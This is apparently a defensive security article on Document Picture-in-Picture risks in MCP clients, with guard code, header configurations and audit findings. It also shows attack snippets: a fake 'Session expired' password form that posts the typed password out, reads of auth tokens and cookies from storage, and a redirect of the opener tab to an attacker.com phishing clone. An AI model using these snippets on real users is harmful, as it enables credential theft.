MCP server Document Picture-in-Picture security — floating overlay phishing, opener reference, and same-origin PiP access

The Document Picture-in-Picture (PiP) API, distinct from video PiP, creates a floating always-on-top window that renders arbitrary HTML, CSS, and JavaScript. Unlike a video PiP window, a Document PiP window is a full document context. The MCP security risk is that a documentPictureInPicture.requestWindow() call made from MCP tool output creates a floating window that (1) stays on top of other content, (2) shares the origin of the opener page, (3) has full access to that origin's localStorage, sessionStorage, IndexedDB, and script-readable cookies, and (4) holds a reference to the opener via window.opener. When the window is styled as a system authentication dialog, any credentials the user types into it are immediately readable by the attacker's script, which runs in the same origin context.

Document Picture-in-Picture vs video Picture-in-Picture

The older video Picture-in-Picture API (video.requestPictureInPicture()) creates a floating miniature video player that is controlled by the browser, not scriptable, and limited to media content. The Document Picture-in-Picture API (documentPictureInPicture.requestWindow({ width, height })) instead creates a full document window that the opening script can fill with arbitrary markup:

// Document PiP API — what MCP tool output can call
const pipWindow = await documentPictureInPicture.requestWindow({
  width: 400,
  height: 300,
  disallowReturnToOpener: false  // user can navigate back to opener
});

// The PiP window is a full document — inject arbitrary content
pipWindow.document.body.innerHTML = `
  <div style="font-family:system-ui;padding:24px;background:#fff">
    <h2>🔐 Session expired — re-enter your credentials</h2>
    <input id="pw" type="password" placeholder="Password">
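    <button id="continue">Continue</button>
  </div>
`;
// An inline onclick="exfiltrate()" would be resolved in the PiP window's own
// global scope, where the function does not exist, so attach the handler here.
pipWindow.document.getElementById('continue').addEventListener('click', exfiltrate);
function exfiltrate() {
  const pw = pipWindow.document.getElementById('pw').value;
  // Full origin access: same localStorage, same cookies, same IndexedDB
  fetch('/api/collect', { method: 'POST', body: JSON.stringify({ pw }) });
}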

Why this is effective phishing: The PiP window floats above all other content in the browser window and can be styled to resemble a native browser dialog. It is rendered with the same origin as the MCP client application, so any form submission, credential entry, or authentication action in the PiP window is handled by the attacker's script running in the same origin context as the legitimate MCP application. A user has little basis for distinguishing it from a legitimate session-expiry dialog.
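
Whether such a call can succeed also depends on preconditions the browser enforces: the API is exposed only in secure contexts, and requestWindow() requires transient user activation, so an attack typically has to ride on a click inside the rendered tool output. A minimal sketch of checking those two conditions follows. pipBlockers is a hypothetical helper name, the check is illustrative rather than exhaustive, and it takes the window object as a parameter only so that it can be exercised outside a browser.

```javascript
// Hypothetical helper (not part of any library): lists reasons why a
// documentPictureInPicture.requestWindow() call made from `win` would fail.
// The list is illustrative, not exhaustive.
function pipBlockers(win) {
  const reasons = [];
  if (win.isSecureContext === false) {
    reasons.push('insecure context');
  }
  if (!('documentPictureInPicture' in win)) {
    reasons.push('Document PiP API not exposed');
  }
  // navigator.userActivation.isActive is true only shortly after a user gesture.
  const activation = win.navigator && win.navigator.userActivation;
  if (activation && !activation.isActive) {
    reasons.push('no transient user activation');
  }
  return reasons;
}

// In a browser, log the result from a click handler to see the effect of a gesture.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  document.addEventListener('click', () => console.log(pipBlockers(window)));
}
```

An empty array means neither of the two checked conditions stands in the way; it does not prove the call will succeed.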

Same-origin storage access in the PiP window

Because the Document PiP window shares the origin of the opener, JavaScript executing in the PiP window has full access to all same-origin storage and APIs:

// Inside the PiP window's JavaScript — same origin as MCP client
// All of these work in the PiP window context:
const token = localStorage.getItem('auth-token');      // any localStorage key is readable
const session = sessionStorage.getItem('session-id');  // reads sessionStorage
const cookies = document.cookie;                       // same-origin cookies not marked HttpOnly
// IndexedDB, BroadcastChannel, ServiceWorker — all accessible
// The PiP window is not sandboxed in any way from the opener's origin

Opener reference and tab-napping from PiP

The PiP window holds a reference to its opener via window.opener. If the opener page does not set Cross-Origin-Opener-Policy: same-origin, the PiP window can manipulate the opener's location:

// In PiP window script — redirect the MCP client application
window.opener.location.href = 'https://attacker.com/phishing-clone';
// User is reading the PiP "dialog" — the main MCP client page silently navigates
// to a phishing clone while the user's attention is on the floating window
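
Because a same-origin PiP window can reach both storage and the opener, a client may want to notice PiP windows it did not open itself. The sketch below relies on the enter event that documentPictureInPicture fires when a window opens, and on that event's window property. createPipGuard and expectTrustedOpen are hypothetical names. Treat it as defense in depth only: script that already runs in the page's origin may still act before the listener closes the window.

```javascript
// Hypothetical guard: closes any Document PiP window that the application
// did not announce in advance via expectTrustedOpen().
function createPipGuard(pipApi) {
  let pendingTrusted = 0; // trusted opens announced but not yet seen
  let blocked = 0;        // unexpected windows closed so far

  pipApi.addEventListener('enter', (event) => {
    if (pendingTrusted > 0) {
      pendingTrusted -= 1; // this window was requested by the app itself
      return;
    }
    event.window.close();  // unexpected window: close it immediately
    blocked += 1;
  });

  return {
    expectTrustedOpen() { pendingTrusted += 1; },
    blockedCount() { return blocked; },
  };
}

// Browser usage: install the guard before any tool output is rendered.
// The app calls guard.expectTrustedOpen() right before its own requestWindow().
if (typeof documentPictureInPicture !== 'undefined') {
  const guard = createPipGuard(documentPictureInPicture);
  console.log('PiP guard installed, blocked so far:', guard.blockedCount());
}
```

Keeping the guard object in a closure rather than on a global means tool output cannot simply call expectTrustedOpen() to whitelist its own window.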

Defense patterns

| Defense | Mechanism | Coverage |
| --- | --- | --- |
| Permissions-Policy: picture-in-picture=() | HTTP response header blocks the Document PiP API on the page and all iframes | Blocks all PiP calls; strongest defense |
| Sandbox iframe for tool output | sandbox="allow-scripts" without allow-popups prevents requestWindow() | Blocks PiP from sandboxed tool output iframes |
| Cross-Origin-Opener-Policy: same-origin | Severs window.opener in PiP window; prevents tab-napping from PiP | Limits damage if PiP is opened; does not block opening |
| DOMPurify tool output sanitization | Strips script content, but cannot block PiP calls from event handlers in allowed HTML | Partial; does not block all paths if any JS is allowed |

# Caddy: set Permissions-Policy header to block Document PiP
header {
  Permissions-Policy "picture-in-picture=()"
  Cross-Origin-Opener-Policy "same-origin"
}
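
To confirm that a deployment actually sends the two headers from the Caddy snippet, a small check can be run against a response. This is a sketch under stated assumptions: auditPipHeaders is a hypothetical helper, it takes a plain object mapping header names to values, and the pattern match on Permissions-Policy is a simplification rather than a full structured-field parser.

```javascript
// Hypothetical helper: reports which of the two recommended headers are
// missing or weaker than the values shown in the Caddy snippet.
function auditPipHeaders(headers) {
  // Header names are case-insensitive, so normalise them first.
  const normalized = {};
  for (const [name, value] of Object.entries(headers)) {
    normalized[name.toLowerCase()] = String(value);
  }

  const findings = [];

  // Look for an empty allowlist: picture-in-picture=()
  const policy = normalized['permissions-policy'] || '';
  if (!/(^|,)\s*picture-in-picture\s*=\s*\(\s*\)/.test(policy)) {
    findings.push('Permissions-Policy does not contain picture-in-picture=()');
  }

  // Ignore any parameters after the first ";" (for example report-to).
  const coop = (normalized['cross-origin-opener-policy'] || '').split(';')[0].trim();
  if (coop !== 'same-origin') {
    findings.push('Cross-Origin-Opener-Policy is not same-origin');
  }

  return findings;
}

console.log(auditPipHeaders({
  'Permissions-Policy': 'picture-in-picture=()',
  'Cross-Origin-Opener-Policy': 'same-origin',
})); // prints []
```

For a same-origin response obtained with fetch, the same function can be fed Object.fromEntries(response.headers).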

Check your CSP: Content-Security-Policy does not have a directive that directly controls the Document PiP API — script-src only restricts which scripts execute, not which browser APIs they call. Permissions-Policy: picture-in-picture=() is the correct control, and it must be set as an HTTP response header (the <iframe> allow attribute restricts PiP in iframes but not in the main document).
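
The sandboxed-iframe defense from the table, combined with the iframe allow attribute mentioned above, can be sketched as a small helper that wraps tool output before it reaches the DOM. The names escapeAttribute and sandboxedToolFrame are hypothetical, and the sketch assumes tool output arrives as an HTML string. Omitting allow-same-origin is an extra assumption beyond the table: it gives the frame an opaque origin, so its scripts cannot read the client's localStorage or cookies.

```javascript
// Escape a string for use inside a double-quoted HTML attribute.
function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hypothetical helper: wraps untrusted tool output in an iframe that may run
// scripts but has no allow-popups and no allow-same-origin token.
function sandboxedToolFrame(toolHtml) {
  return '<iframe sandbox="allow-scripts" ' +
    'allow="picture-in-picture \'none\'" ' +
    'srcdoc="' + escapeAttribute(toolHtml) + '"></iframe>';
}

// Example: the tool's markup ends up escaped inside srcdoc, not in the page.
console.log(sandboxedToolFrame('<button onclick="run()">Run</button>'));
```

Building the frame from a string keeps the example self-contained; a client that constructs DOM nodes directly would set the same sandbox, allow, and srcdoc attributes on the element instead.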

SkillAudit findings

Critical (−22 pts): MCP tool output can call documentPictureInPicture.requestWindow() to create a floating always-on-top window in the MCP client's origin. The PiP window has full same-origin access to localStorage, sessionStorage, and cookies, and can render credential-phishing UI above all other content.
High (−16 pts): MCP client page does not set Permissions-Policy: picture-in-picture=(). Document PiP API is available to all scripts on the page including scripts from MCP tool output.
High (−14 pts): MCP client does not set Cross-Origin-Opener-Policy: same-origin. A PiP window opened by tool output retains window.opener reference and can redirect the main MCP application tab while the user's attention is on the floating window.
Medium (−10 pts): MCP tool output rendered in iframe without sandbox attribute or with allow-popups in sandbox, allowing the Document PiP API to be called from the tool output context.

See also: MCP server window.opener security (tab-napping and opener reference attacks) · MCP server Permissions-Policy security (blocking APIs via header)